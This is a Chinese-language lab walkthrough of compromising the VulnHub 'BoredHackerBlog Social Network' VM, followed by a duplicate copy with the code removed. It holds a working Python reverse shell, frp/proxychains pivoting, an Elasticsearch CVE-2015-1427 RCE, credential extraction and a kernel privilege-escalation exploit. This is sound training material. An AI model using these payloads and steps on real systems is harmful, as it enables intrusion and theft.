VnlnHub BOREDHACKERBLOG SOCIAL NETWORK
字数 1337 2025-08-12 11:34:19

BOREDHACKERBLOG SOCIAL NETWORK 靶场渗透测试教学文档

靶场环境搭建

  1. 下载靶场

    • 下载地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
    • 文件格式:.ova虚拟机压缩文件
  2. 导入虚拟机

    • 使用VMware导入.ova文件
    • 网络模式设置:
      • 推荐使用NAT模式
      • 也可使用桥接模式(需与Kali攻击机保持一致)

信息收集阶段

  1. 扫描目标IP

    • 假设Kali攻击机IP为192.168.52.128
    • 推测靶机IP为192.168.52.129
  2. 端口扫描

    nmap -sT -p 0-65535 -A 192.168.52.129
    
    • 开放端口:
      • 22端口:SSH服务
      • 5000端口:Werkzeug httpd 0.14.1 (Python web服务)

Web应用渗透

  1. 初步测试

    • 访问http://192.168.52.129:5000
    • 测试评论功能,确认无XSS漏洞
  2. 目录扫描

    • 发现/admin路径
    • 存在代码执行功能,使用exec()执行Python代码
  3. 代码执行利用

    • 尝试执行Python反弹shell:
    import os
    os.system('nc -l -p 4444 -e /bin/bash')
    
    • 失败原因:目标主机无netcat工具
  4. 替代反弹shell方法

    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("192.168.52.128",4445))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"]);
    
    • 在Kali上监听:
    nc -lvnp 4445
    
    • 成功获取shell

内网渗透

  1. 环境确认

    • 发现处于Docker容器环境
  2. 内网主机扫描

    • 发现活跃主机:172.17.0.1-3
  3. 内网穿透设置

    • 使用frp工具进行内网穿透
    • 下载地址:https://github.com/fatedier/frp
    • 配置frpc.ini文件:
      • 设置服务器地址为Kali攻击机IP
      • 添加socks代理配置
  4. 文件传输

    • 在Kali搭建临时web服务:
    python3 -m http.server 80
    # 或
    python2 -m SimpleHTTPServer 80
    
    • 在靶机下载frp客户端:
    wget http://<kali_ip>/frpc
    wget http://<kali_ip>/frpc.ini
    
  5. 启动frp服务

    • Kali端:
    ./frps -c frps.ini
    
    • 靶机端:
    ./frpc -c frpc.ini
    
  6. 配置代理

    • 修改/etc/proxychains4.conf
    • 添加socks代理配置
  7. 内网扫描

    proxychains nmap -sT -A 172.17.0.2
    
    • 发现9200端口:Elasticsearch REST API 1.4.2

Elasticsearch漏洞利用

  1. 漏洞识别

    • CVE-2015-1427 (Elasticsearch 1.4.2 RCE漏洞)
  2. 利用漏洞

    • 下载并执行对应exp
    • 获取root权限
    • 发现passwords文件,提取密码和hash

SSH登录

  1. 尝试登录
    • 使用获得的凭据尝试SSH登录
    • 只有john用户可以成功登录

权限提升

  1. 信息收集

    • 使用linpeas工具进行自动化信息收集
    ./linpeas.sh
    
  2. 内核漏洞利用

    • 搜索Linux 3.13内核漏洞:
    searchsploit linux 3.13
    
    • 选择漏洞37292.c
  3. 漏洞利用准备

    • 复制exp到本地:
    cp /usr/share/exploitdb/exploits/linux/local/37292.c /root
    
    • 修改代码(移除gcc依赖部分)
    • 在Kali上编译:
    gcc 37292.c -o exploit
    
  4. 文件传输与执行

    • 上传编译后的exploit和ofs-lib.so到靶机
    • 赋予执行权限:
    chmod +x exploit
    
    • 执行:
    ./exploit
    
    • 成功获取root权限

总结

本渗透测试完整流程包括:

  1. 靶场环境搭建
  2. 信息收集与端口扫描
  3. Web应用漏洞利用(代码执行)
  4. 内网穿透与内网主机发现
  5. Elasticsearch RCE漏洞利用
  6. 凭据获取与SSH登录
  7. 内核漏洞提权

关键点:

  • 灵活运用多种反弹shell方法
  • 内网穿透技术的应用
  • 特定服务版本漏洞的识别与利用
  • 权限提升时的多种尝试策略
BOREDHACKERBLOG SOCIAL NETWORK 靶场渗透测试教学文档 靶场环境搭建 下载靶场 : 下载地址:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 文件格式:.ova虚拟机压缩文件 导入虚拟机 : 使用VMware导入.ova文件 网络模式设置: 推荐使用NAT模式 也可使用桥接模式(需与Kali攻击机保持一致) 信息收集阶段 扫描目标IP : 假设Kali攻击机IP为192.168.52.128 推测靶机IP为192.168.52.129 端口扫描 : 开放端口: 22端口:SSH服务 5000端口:Werkzeug httpd 0.14.1 (Python web服务) Web应用渗透 初步测试 : 访问http://192.168.52.129:5000 测试评论功能,确认无XSS漏洞 目录扫描 : 发现/admin路径 存在代码执行功能,使用exec()执行Python代码 代码执行利用 : 尝试执行Python反弹shell: 失败原因:目标主机无netcat工具 替代反弹shell方法 : 在Kali上监听: 成功获取shell 内网渗透 环境确认 : 发现处于Docker容器环境 内网主机扫描 : 发现活跃主机:172.17.0.1-3 内网穿透设置 : 使用frp工具进行内网穿透 下载地址:https://github.com/fatedier/frp 配置frpc.ini文件: 设置服务器地址为Kali攻击机IP 添加socks代理配置 文件传输 : 在Kali搭建临时web服务: 在靶机下载frp客户端: 启动frp服务 : Kali端: 靶机端: 配置代理 : 修改/etc/proxychains4.conf 添加socks代理配置 内网扫描 : 发现9200端口:Elasticsearch REST API 1.4.2 Elasticsearch漏洞利用 漏洞识别 : CVE-2015-1427 (Elasticsearch 1.4.2 RCE漏洞) 利用漏洞 : 下载并执行对应exp 获取root权限 发现passwords文件,提取密码和hash SSH登录 尝试登录 : 使用获得的凭据尝试SSH登录 只有john用户可以成功登录 权限提升 信息收集 : 使用linpeas工具进行自动化信息收集 内核漏洞利用 : 搜索Linux 3.13内核漏洞: 选择漏洞37292.c 漏洞利用准备 : 复制exp到本地: 修改代码(移除gcc依赖部分) 在Kali上编译: 文件传输与执行 : 上传编译后的exploit和ofs-lib.so到靶机 赋予执行权限: 执行: 成功获取root权限 总结 本渗透测试完整流程包括: 靶场环境搭建 信息收集与端口扫描 Web应用漏洞利用(代码执行) 内网穿透与内网主机发现 Elasticsearch RCE漏洞利用 凭据获取与SSH登录 内核漏洞提权 关键点: 灵活运用多种反弹shell方法 内网穿透技术的应用 特定服务版本漏洞的识别与利用 权限提升时的多种尝试策略